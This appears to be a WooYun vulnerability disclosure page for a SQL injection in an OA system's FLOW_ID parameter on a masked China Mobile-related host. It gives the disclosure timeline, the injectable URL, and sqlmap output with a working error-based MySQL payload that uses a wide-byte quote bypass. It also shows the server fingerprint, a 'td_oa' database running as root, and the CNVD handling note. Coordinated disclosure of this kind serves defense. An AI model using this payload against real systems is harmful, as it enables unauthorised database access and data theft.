WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
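2015-10-21: Details reported to the vendor; awaiting vendor handling
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and experts in related fields
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public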
**.**.**.**/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: FLOW_ID=11%bf' AND (SELECT 7735 FROM(SELECT COUNT(*),CONCAT(0x7161686b71,(SELECT (CASE WHEN (7735=7735) THEN 1 ELSE 0 END)),0x7164656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Pewq
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.2.17
back-end DBMS: MySQL 5.0
current database: 'td_oa'
current user: 'root@**.**.**.**'
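Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-23 10:59
CNVD confirmed and reproduced the situation described, and has passed it to CNCERT to notify China Mobile Group, which will coordinate follow-up handling with the website's administrators.
None yet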